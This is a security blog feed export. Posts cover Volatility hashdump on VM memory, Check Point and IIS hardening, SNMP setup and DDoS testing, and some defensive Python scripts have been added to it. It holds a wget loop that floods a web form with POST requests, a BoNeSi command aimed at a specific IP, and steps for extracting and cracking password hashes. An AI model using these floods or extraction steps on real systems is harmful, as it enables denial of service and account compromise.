tag:blogger.com,1999:blog-46951880255103902102024-03-14T00:25:51.422+03:00Information Security NotesThe Simplest and Best Way to Manage Checkpoint Secure Platform
http://www.smartsplat.com
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comBlogger71125tag:blogger.com,1999:blog-4695188025510390210.post-66195237694650618022014-03-11T22:57:00.002+02:002022-11-03T17:09:33.089+03:00Penetration Testing Framework --- Smart Pentester ---<br />
<br />
I'm pleased to announce the first public release of Smart Pentester, which aims to be a framework for penetration testers: <a href="http://smartpentester.com/"><strong>http://smartpentester.com/</strong></a><br />
<br />
SmartPentester can be downloaded at the Google Drive link below<br />
<br /><a href="https://drive.google.com/file/d/1FVi8tUPTyAhF3w710OR_vReu3RAfLgXV/view">https://drive.google.com/file/d/1FVi8tUPTyAhF3w710OR_vReu3RAfLgXV/view</a><div><br />
<br />
Note: there is a false-positive virus warning on the file download. A new portable file will be uploaded soon.<br />
<br />
The Smart Pentester Framework will provide a user interface for penetration testing, malware analysis, forensic analysis, cyber intelligence, advanced packet generation techniques and more...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-2ZOB5tHeqYQ/Ux92-f2iyRI/AAAAAAAAAVo/sKEThBo0K-E/s1600/Smart_Pentester_Beta.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://3.bp.blogspot.com/-2ZOB5tHeqYQ/Ux92-f2iyRI/AAAAAAAAAVo/sKEThBo0K-E/s1600/Smart_Pentester_Beta.png" width="400" /></a></div>
<br />
<br />
<span style="font-size: x-small;"></span></div>Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-68552478527943640842013-02-17T14:48:00.000+02:002013-02-17T14:50:50.808+02:00Examining a Suspended Virtual Machine<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;">I would like to show the danger of suspended virtual machines. With the tool called Volatility there are several things you can extract from a vmem file; the available options can be found at the link below<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<a href="http://code.google.com/p/volatility/wiki/CommandReference"><span style="font-family: Verdana, sans-serif;">http://code.google.com/p/volatility/wiki/CommandReference</span></a><o:p></o:p></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;">In this example, we will recover the local password for the related OS user.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif; line-height: 115%;">To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, like this:</span><o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-AymUEMhSg_w/USDRKEJuZDI/AAAAAAAAAS8/5qn-P-3M0XI/s1600/volatility_cagdas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="220" src="http://3.bp.blogspot.com/-AymUEMhSg_w/USDRKEJuZDI/AAAAAAAAAS8/5qn-P-3M0XI/s400/volatility_cagdas.jpg" uea="true" width="400" /></span></a></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif; line-height: 115%;">The hashes can now be cracked using John the Ripper, rainbow tables, etc.</span><o:p></o:p></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;">In this example I have used <span style="line-height: 115%;">cracker.offensive-security.com; the password appeared within a few minutes.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-4LdJDzMbQx4/USDRS7tB2GI/AAAAAAAAATE/GHBB6mz-ydc/s1600/cracker_cagdas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="42" src="http://1.bp.blogspot.com/-4LdJDzMbQx4/USDRS7tB2GI/AAAAAAAAATE/GHBB6mz-ydc/s400/cracker_cagdas.jpg" uea="true" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-79537897433467767182013-02-17T14:42:00.001+02:002013-02-17T14:52:15.341+02:00Illegal post SYN packet<br />Symptoms: fw ctl zdebug shows drops like: _tcstate_update Reason: Illegal post SYN packet;<br />
<br />
Any packet from the client other than a SYN or RST is considered a security issue: the firewall assumes the client is trying to send packets before the server has responded to the initial SYN request.<br />
In order to allow such unexpected packets, enable the related kernel parameter on the Security Gateway. Keep in mind that the parameter is gateway-wide, so it relaxes this stateful check for every connection, not only the one being troubleshot.<br />
<br />
Check the current value with:<br />
# fw ctl get int fw_allow_out_of_state_post_syn<br />
<br />
# fw ctl set int fw_allow_out_of_state_post_syn 1 (activate on the fly)<br />
# fw ctl set int fw_allow_out_of_state_post_syn 0 (deactivate on the fly)<br />
<br />
If it helps to resolve the issue, it's time to make the setting persistent across reboots.<br />
Create the $FWDIR/boot/modules/fwkern.conf file if it doesn't exist; this file is not present by default.<br />
<br />
[Expert@testfw]# cd $FWDIR/boot/modules/<br />
[Expert@testfw]# pwd<br />
/opt/CPsuite-R7X/fw1/boot/modules<br />
[Expert@testfw]# vi fwkern.conf<br />
<br />
fw_allow_out_of_state_post_syn=0x1<br />
<br />
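As an added check, not part of the original post: a value set with fw ctl set is lost at reboot, and because this parameter relaxes stateful inspection for the whole gateway, the running and boot-time values should match on purpose. The script below parses constructed samples of the fw ctl get int output (its "name = value" layout is an assumption) and of fwkern.conf, reports any drift, and can rewrite the fwkern.conf line in the hex form used above.<br />

```python
import re

# Parameter from the post (a global Check Point kernel parameter).
PARAM = "fw_allow_out_of_state_post_syn"

# Constructed sample of what "fw ctl get int PARAM" prints; the "name = value"
# layout is an assumption, not output captured from a real gateway.
RUNNING_OUTPUT = "fw_allow_out_of_state_post_syn = 1\n"

# Constructed sample of $FWDIR/boot/modules/fwkern.conf.
FWKERN_CONF = """# kernel parameters applied at boot (constructed sample)
fw_allow_out_of_state_post_syn=0x0
"""


def parse_fw_ctl_get_int(output, name):
    """Return the running integer value for NAME from 'fw ctl get int' output, or None."""
    m = re.search(r"^\s*%s\s*=\s*(-?\d+)\s*$" % re.escape(name), output, re.M)
    return int(m.group(1)) if m else None


def parse_int(raw):
    """fwkern.conf values may be hex (0x1, as in the post) or plain decimal."""
    raw = raw.strip()
    return int(raw, 16) if raw.lower().startswith("0x") else int(raw, 10)


def parse_fwkern_conf(text, name):
    """Return the boot-time value for NAME, or None if it is not persisted.
    '#' comments and blank lines are skipped; the last assignment wins."""
    value = None
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        key, raw = line.split("=", 1)
        if key.strip() == name:
            value = parse_int(raw)
    return value


def set_fwkern_param(text, name, value):
    """Return fwkern.conf text with NAME=0xVALUE: an existing assignment is
    replaced in place (the rest of the file is kept), else a line is appended."""
    new_line = "%s=0x%x" % (name, value)
    lines = text.splitlines()
    replaced = False
    for i, line in enumerate(lines):
        stripped = line.split("#", 1)[0].strip()
        if "=" in stripped and stripped.split("=", 1)[0].strip() == name:
            lines[i] = new_line
            replaced = True
    if not replaced:
        lines.append(new_line)
    return "\n".join(lines) + "\n"


def check_persistence(running_output, conf_text, name):
    """Compare the running value with the boot value and classify the result:
    'ok', 'drift' (values differ), 'not_persisted' (no fwkern.conf entry) or
    'unknown' (the running value could not be parsed)."""
    running = parse_fw_ctl_get_int(running_output, name)
    boot = parse_fwkern_conf(conf_text, name)
    if running is None:
        status = "unknown"
    elif boot is None:
        status = "not_persisted"
    elif running != boot:
        status = "drift"
    else:
        status = "ok"
    return {"status": status, "running": running, "boot": boot}


if __name__ == "__main__":
    report = check_persistence(RUNNING_OUTPUT, FWKERN_CONF, PARAM)
    print(report)
    if report["status"] in ("drift", "not_persisted"):
        # Propose the fwkern.conf content that would persist the running value.
        print(set_fwkern_param(FWKERN_CONF, PARAM, report["running"]))
```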
Define it with its hex value.<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-83222975388038915102013-02-06T14:12:00.002+02:002013-02-06T14:29:27.943+02:00IIS Tuning Recommendations against Slow HTTP Attacks<br />If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.<br />
A single attacker can take down a victim web server with minimal bandwidth.<br />
<br />
Request attributes are limited through the requestLimits element, specifically its maxAllowedContentLength, maxQueryString, and maxUrl attributes:<br />
<a href="http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits">http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits</a><br />
<br />
Suggested values:<br />
Maximum URL length: 2 KB, by specifying 2048.<br />
Maximum query string length: 1 KB, by specifying 1024.<br />
Deny access to unlisted HTTP verbs by clearing the "Allow unlisted verbs" check box.<br />
<br />
Set headerLimits to configure the type and size of the headers your web server will accept:<br />
<a href="http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits/headerlimits">http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits/headerlimits</a><br />
<br />
Suggested value:<br />
Content-type: 100 bytes<br />
<br />
Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the limits and webLimits elements to minimize the impact of slow HTTP attacks.<br />
<br />
Suggested values:<br />
connectionTimeout: 30 sec<br />
headerWaitTimeout: 30 sec<br />
minBytesPerSecond: 250<br />
<br />
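The following audit script is an added example, not from the original post and not Microsoft's tooling: it parses a constructed applicationHost.config-style fragment and reports every setting that is looser than the suggestions above (a missing attribute is reported as unset, since IIS then applies its built-in default). The two embedded fragments are constructed samples showing a generous configuration beside the tightened one.<br />

```python
import xml.etree.ElementTree as ET

# Constructed applicationHost.config-style sample with generous limits
# (not the IIS defaults and not a real server's file).
WEAK_CONFIG = """<configuration>
  <system.applicationHost>
    <sites><siteDefaults><limits connectionTimeout="00:02:00" /></siteDefaults></sites>
    <webLimits headerWaitTimeout="00:02:00" minBytesPerSecond="0" />
  </system.applicationHost>
  <system.webServer><security>
    <requestFiltering>
      <requestLimits maxUrl="4096" maxQueryString="2048" />
      <verbs allowUnlisted="true" />
    </requestFiltering>
  </security></system.webServer>
</configuration>"""

# The same constructed sample with the values suggested in the post applied.
HARDENED_CONFIG = """<configuration>
  <system.applicationHost>
    <sites><siteDefaults><limits connectionTimeout="00:00:30" /></siteDefaults></sites>
    <webLimits headerWaitTimeout="00:00:30" minBytesPerSecond="250" />
  </system.applicationHost>
  <system.webServer><security>
    <requestFiltering>
      <requestLimits maxUrl="2048" maxQueryString="1024">
        <headerLimits><add header="Content-type" sizeLimit="100" /></headerLimits>
      </requestLimits>
      <verbs allowUnlisted="false">
        <add verb="GET" allowed="true" /><add verb="POST" allowed="true" />
      </verbs>
    </requestFiltering>
  </security></system.webServer>
</configuration>"""

RF = "system.webServer/security/requestFiltering"


def timespan_seconds(value):
    """Convert an IIS hh:mm:ss timespan attribute to seconds."""
    h, m, s = (int(part) for part in value.split(":"))
    return h * 3600 + m * 60 + s


def audit_iis_limits(xml_text):
    """Return findings (strings) where the config is looser than the post's suggestions.
    A missing attribute is reported as unset: IIS then applies its built-in default,
    which the auditor must look up rather than assume."""
    root = ET.fromstring(xml_text)
    findings = []

    def attr(path, name):
        node = root.find(path)
        return None if node is None else node.get(name)

    # (element path, attribute, suggested limit, "max" = at most / "min" = at least)
    numeric = [
        (RF + "/requestLimits", "maxUrl", 2048, "max"),
        (RF + "/requestLimits", "maxQueryString", 1024, "max"),
        ("system.applicationHost/webLimits", "minBytesPerSecond", 250, "min"),
    ]
    for path, name, limit, kind in numeric:
        raw = attr(path, name)
        if raw is None:
            findings.append("%s not set" % name)
        elif (kind == "max" and int(raw) > limit) or (kind == "min" and int(raw) < limit):
            op = "<=" if kind == "max" else ">="
            findings.append("%s=%s (suggested %s %d)" % (name, raw, op, limit))

    timeouts = [("system.applicationHost/sites/siteDefaults/limits", "connectionTimeout"),
                ("system.applicationHost/webLimits", "headerWaitTimeout")]
    for path, name in timeouts:
        raw = attr(path, name)
        if raw is None:
            findings.append("%s not set" % name)
        elif timespan_seconds(raw) > 30:
            findings.append("%s=%s (suggested <= 30s)" % (name, raw))

    ct = root.find(RF + "/requestLimits/headerLimits/add[@header='Content-type']")
    if ct is None:
        findings.append("no headerLimits entry for Content-type")
    elif int(ct.get("sizeLimit", "0")) > 100:
        findings.append("Content-type sizeLimit=%s (suggested <= 100)" % ct.get("sizeLimit"))

    if attr(RF + "/verbs", "allowUnlisted") != "false":
        findings.append("unlisted HTTP verbs are allowed")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_iis_limits(cfg))
```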
Limits<br />
<a href="http://www.iis.net/configreference/system.applicationhost/sites/sitedefaults/limits">http://www.iis.net/configreference/system.applicationhost/sites/sitedefaults/limits</a><br />
<br />
Web Limits<br />
<a href="http://www.iis.net/configreference/system.applicationhost/weblimits">http://www.iis.net/configreference/system.applicationhost/weblimits</a><br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-55676163988079635112013-01-12T23:39:00.000+02:002013-01-14T14:39:31.438+02:00Let's do Some HTTP Post Flood<br />This tool allows you to edit and replicate HTTP parameters after the request finally leaves your browser.<br />
It's for educational purposes only. The aim of this tool is to show wget usage.<br />
It can be downloaded at<br />
<b><a href="https://docs.google.com/file/d/0B0EDab8sQhCCYTRvTlhFUTZwOTA/edit">https://docs.google.com/file/d/0B0EDab8sQhCCYTRvTlhFUTZwOTA/edit</a></b><br />
<br />
File name: HTTP Flooder v1.0 Uses WGET.zip<br />
It uses wget.exe located on the C:\ drive and creates an HTML file of the HTTP response in the directory where it runs.<br />
<br />
Example usage: before running it, sniff the traffic with a local proxy like WebScarab and copy/paste the final request data to flood.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-fGeoRonEjUg/UPHYUMY7E9I/AAAAAAAAASU/ytjYEjfFOiI/s1600/http_flooder_v1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-fGeoRonEjUg/UPHYUMY7E9I/AAAAAAAAASU/ytjYEjfFOiI/s1600/http_flooder_v1.JPG" /></a></div>
<br />
<br />
<br />
For Linux users,<br />
an example of a simple bash script that will do 100 POST requests:<br />
<br />
#!/bin/bash<br />
for i in {1..100};<br />
do<br />
wget --user-agent=Firefox/10 --referer=https://www.vulnwebtest.com --post-data="__VIEWSTATE=%2FwEPDwULLTExMjU2MzY2MjcPZBYCAgMPZBYSAgMPDxYCHgRUZXh0BQxVc2VyIE5hbWUgOiBkZAIFDw8WBB8ABQR0ZXN0HgdFbmFibGVkaGRkAgcAPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwJoZGQCDQ8PFgIfAmdkZAIPDw8WB9B8ABQR0ZXN0HwJnZGQCEQ8PAFgIfAmdkZAITDw8WAh8CZ2RkAhUPDxYCHwJnZGRk8Nl1HK2Uc%2B9sUZwQEPNDjmgqRms%3D&__EVENTVALIDATION=%2FwEWBAK41KgrAuzRsusGAuzR9tkMArursYYIKiocz95qxVisTmMDLVdMhHxNkYk%3D&Email=test&Button=Send+Password" --no-check-certificate --no-dns-cache http://www.vulnwebtest.com/test.aspx<br />
done<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-39398013440605724912012-12-11T17:29:00.001+02:002012-12-25T17:48:56.992+02:00How to Simulate a HTTP GET BotNet DDoS Attack<br />Today I would like to share a cool tool called BoNeSi, a DDoS Botnet Simulator.<br />
<br />
Web page: <a href="http://code.google.com/p/bonesi/">http://code.google.com/p/bonesi/</a><br />
<br />
BoNeSi is able to simulate a TCP-based HTTP-GET flood against a victim, with the 3-way handshake completed. This is a much more advanced testing technique than a SYN flood with hping, which can only send TCP packets with chosen flags.<br />
Since non-spoofed IP connections require a correct routing setup, this tool can only be used in closed testbed setups.<br />
<br />
It can establish several thousand HTTP connections from different IP addresses defined in iplist.txt, which lets the tool simulate advanced bot networks.<br />
<br />
How does TCP spoofing work?<br />
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary that all traffic from the target webserver is routed back to the host running BoNeSi.<br />
HTTP-flooding attacks cannot be simulated over the Internet, because the answers from the webserver must be routed back to the host running BoNeSi.<br />
<br />
It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly. <br />
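On the defensive side, a flood of the kind BoNeSi generates shows up in the web server's access log as a burst of completed GET requests from many distinct source addresses, typically cycling through a short user-agent list. The detection below is an added example, not code from the BoNeSi project: it buckets constructed Common Log Format lines into 10-second windows and flags windows where both the request count and the number of distinct sources reach a threshold; the sample log and the thresholds are assumptions to be tuned per site.<br />

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Common Log Format with the optional referer and user-agent fields.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict (ts as an aware datetime), or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    return rec


def detect_get_flood(lines, window=10, min_requests=100, min_sources=20):
    """Group GET requests into fixed windows of `window` seconds and return one
    alert per window whose request count AND distinct-source count both reach
    the thresholds. A single chatty client never trips the source threshold;
    a botnet-style flood (many completed connections from many IPs) does."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        buckets[int(rec["ts"].timestamp()) // window].append(rec)

    alerts = []
    for bucket, recs in sorted(buckets.items()):
        sources = Counter(r["ip"] for r in recs)
        if len(recs) < min_requests or len(sources) < min_sources:
            continue
        paths = Counter(r["path"] for r in recs)
        agents = Counter(r["ua"] or "-" for r in recs)
        top_path, top_count = paths.most_common(1)[0]
        alerts.append({
            "window_start": bucket * window,     # epoch seconds of the window
            "requests": len(recs),
            "distinct_sources": len(sources),
            "top_path": top_path,
            "top_path_share": top_count / len(recs),
            "distinct_agents": len(agents),      # small when a tool cycles a UA list
        })
    return alerts


def make_sample_log():
    """Constructed sample: five normal requests, then 150 GETs within ten seconds
    from 30 addresses in one /24 cycling through three user agents."""
    lines = []
    quiet = ('10.0.0.%d - - [11/Dec/2012:17:29:%02d +0200] "GET /index.html HTTP/1.1" '
             '200 512 "-" "Mozilla/5.0"')
    for i in range(5):
        lines.append(quiet % (i + 1, i))
    agents = ["Mozilla/4.0 (compatible; MSIE 6.0)", "Opera/9.80", "Mozilla/5.0 (X11; Linux)"]
    flood = '192.0.2.%d - - [11/Dec/2012:17:30:%02d +0200] "GET / HTTP/1.1" 200 1024 "-" "%s"'
    for i in range(150):
        lines.append(flood % (i % 30 + 1, i % 10, agents[i % 3]))
    return lines


if __name__ == "__main__":
    for alert in detect_get_flood(make_sample_log()):
        print(alert)
```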
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Wdj7TQPBHVI/UMdRCAe3nzI/AAAAAAAAARs/7E3QUHCZdy8/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img bea="true" border="0" height="245" src="http://3.bp.blogspot.com/-Wdj7TQPBHVI/UMdRCAe3nzI/AAAAAAAAARs/7E3QUHCZdy8/s400/Capture.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-EKBWWQJFtlY/UMdREvX2FCI/AAAAAAAAAR0/Jz0MNFcCsvw/s1600/Capture2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img bea="true" border="0" height="297" src="http://3.bp.blogspot.com/-EKBWWQJFtlY/UMdREvX2FCI/AAAAAAAAAR0/Jz0MNFcCsvw/s400/Capture2.JPG" width="400" /></a></div>
My test usage was:<br />
# bonesi -i 50k-bots.txt -p tcp -r 0 -u <a href="http://cagdastestlab.com/">http://cagdastestlab.com</a> -b useragent.txt -d eth1 -v 213.153.205.182:80<br />
<br />
<br />
<br />
<span style="font-size: x-small;">Usage: bonesi [OPTION...] <dst_ip:port></span><br />
<span style="font-size: x-small;"> Options:</span><br />
<span style="font-size: x-small;"> -i, --ips=FILENAME filename with ip list</span><br />
<span style="font-size: x-small;"> -p, --protocol=PROTO udp (default), icmp or tcp</span><br />
<span style="font-size: x-small;"> -r, --send_rate=NUM packets per second, 0 = infinite (default)</span><br />
<span style="font-size: x-small;"> -s, --payload_size=SIZE size of the paylod, (default: 32)</span><br />
<span style="font-size: x-small;"> -o, --stats_file=FILENAME filename for the statistics, (default: 'stats')</span><br />
<span style="font-size: x-small;"> -c, --max_packets=NUM maximum number of packets (requests at tcp/http), 0 = infinite (default)</span><br />
<span style="font-size: x-small;"> --integer IPs are integers in host byte order instead of in dotted notation</span><br />
<span style="font-size: x-small;"> -t, --max_bots=NUM determine max_bots in the 24bit prefix randomly (1-256)</span><br />
<span style="font-size: x-small;"> -u, --url=URL the url (default: '/') (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -l, --url_list=FILENAME filename with url list (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -b, --useragent_list=FILENAME filename with useragent list (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -d, --device=DEVICE network listening device (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -m, --mtu=NUM set MTU, (default 1500)</span><br />
<span style="font-size: x-small;"> -f, --frag=NUM set fragmentation mode (0=IP, 1=TCP, default: 0)</span><br />
<span style="font-size: x-small;"> -v, --verbose print additional debug messages</span><br />
<span style="font-size: x-small;"> -h, --help print this message and exit</span><br />
<br />
<br />
<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.com1tag:blogger.com,1999:blog-4695188025510390210.post-71783427817283416902012-11-26T15:26:00.001+02:002012-12-06T12:01:24.693+02:00Smart Uploader (GUI for cp_uploader.exe)<br />As you know, Check Point released a new upload tool called the Check Point Uploader utility (sk84000).<br />
This tool enables you to upload files securely to Check Point using your User Center credentials.<br />
<br />
I have developed a GUI for cp_uploader.exe.<br />
Enjoy it!<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-oxrEIsNBeHo/ULNt9b32z2I/AAAAAAAAARU/vuL0aYyw6Do/s1600/SmartUploader.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://2.bp.blogspot.com/-oxrEIsNBeHo/ULNt9b32z2I/AAAAAAAAARU/vuL0aYyw6Do/s400/SmartUploader.JPG" tea="true" width="400" /></a></div>
<br />
<br />
<br />
<a href="https://docs.google.com/open?id=0B0EDab8sQhCCUlN5YlctZ0c2dmM" target="_blank">Click to download Smart Uploader</a><br />
<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.com1tag:blogger.com,1999:blog-4695188025510390210.post-18317036039381836902012-11-14T17:49:00.000+02:002012-11-14T17:49:19.582+02:00How to Enable SNMP on Checkpoint<br /># snmp service disable<br /># snmp service enable<br />
# snmp user show<br />You should delete the community named public<br />
# snmp user del public<br />
# snmp user add noauthuser CommunityName<br />
<br /># snmp service stat<br />You should see <br />SNMP service enabled and listening on port 161.<br />
Enable the SNMP extensions:<br />
# cp_conf snmp get<br />Currently SNMP Extension is active<br />
# cp_conf snmp activate<br />
Check the ports; both 260 and 161 should be listening.<br />
<br />Let's do some SNMP walks.<br />
Total RAM on the system:<br /># snmpwalk -v1 -c CommunityName firewallipaddress .1.3.6.1.4.1.2021.4.5.0<br />
Run fw tab -t connections -s and count the connections to compare with:<br /># snmpwalk -v1 -c testcom 192.168.1.112 .1.3.6.1.4.1.2620.1.1.25.3.0<br />
<br />The net-snmp version should be 5.3.1.0-2;<br />check it with the command # rpm -qa | grep net-snmp<br />
Some Checkpoint SNMP OIDs:<br />
CPU Usage .1.3.6.1.4.1.2620.1.6.7.2.4.0 <br />CPU System .1.3.6.1.4.1.2620.1.6.7.2.2.0 <br />CPU User .1.3.6.1.4.1.2620.1.6.7.2.1.0 <br />Number of Connections .1.3.6.1.4.1.2620.1.1.25.3.0 <br />Peak Number of Connections .1.3.6.1.4.1.2620.1.1.25.4.0 <br />Memory Total .1.3.6.1.4.1.2620.1.6.7.4.3.0 <br />Memory Used .1.3.6.1.4.1.2620.1.6.7.4.4.0 <br />Memory Free 1.3.6.1.4.1.2620.1.6.7.1.5.0 <br />Memory Buffered .1.3.6.1.4.1.2021.4.14.0 <br />Memory cached .1.3.6.1.4.1.2021.4.15.0 <br />Swap error .1.3.6.1.4.1.2021.4.100.0 <br />CPU FAN Speed 1.3.6.1.4.1.2620.1.6.7.8.2.1.3.1.0 <br />Chassis FAN Speed 1.3.6.1.4.1.2620.1.6.7.8.2.1.3.2.0 <br />Core Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.1.0 <br />VCC+Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.2.0 <br />1.8 Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.3.0 <br />5V Power Supply In 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.4.0 <br />5V Standby Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.5.0 <br />Battery Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.6.0 <br />CPU temperature 1.3.6.1.4.1.2620.1.6.7.8.1.1.3.1.0 <br />M/B Temperature 1.3.6.1.4.1.2620.1.6.7.8.1.1.3.2.0Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-28953532543293564702012-11-14T13:59:00.000+02:002012-11-14T14:03:43.535+02:00DDoS Seminar in Ankara<div class="separator" style="clear: both; text-align: left;">
Last Friday Checkpoint and InfoNet prepared a DDoS seminar in Ankara,</div>
I had created a lab similar to the one in <a href="http://www.youtube.com/watch?v=5rhw7zsiarQ&feature=plcp" target="_blank">http://www.youtube.com/watch?v=5rhw7zsiarQ&feature=plcp</a> that I posted earlier.<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
The lab had two phases, with the DDoS Protector and without it, where the attacker directly faces the firewall; we investigated and compared both behaviours.<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After showing some attack vectors, the main subject was to explain why we need a DDoS mitigation device rather than getting this as a service from the ISP, why it is a network design problem, and how to deal with it at every hop.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WVGbB_d7Tjc/UKN07dkDZxI/AAAAAAAAAQw/e7GuEGMXkZc/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://3.bp.blogspot.com/-WVGbB_d7Tjc/UKN07dkDZxI/AAAAAAAAAQw/e7GuEGMXkZc/s1600/1.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DEe1X8lC8Fs/UKN09Q1wUyI/AAAAAAAAAQ4/Ut9hzNzROJI/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-DEe1X8lC8Fs/UKN09Q1wUyI/AAAAAAAAAQ4/Ut9hzNzROJI/s1600/5.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1N4xH0EyQzo/UKN0_bFufjI/AAAAAAAAARA/z7xlzgceoYw/s1600/6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-1N4xH0EyQzo/UKN0_bFufjI/AAAAAAAAARA/z7xlzgceoYw/s1600/6.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-19653678274624524702012-11-10T13:43:00.003+02:002013-02-16T13:37:06.882+02:00Recently Published Posts in Journals<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
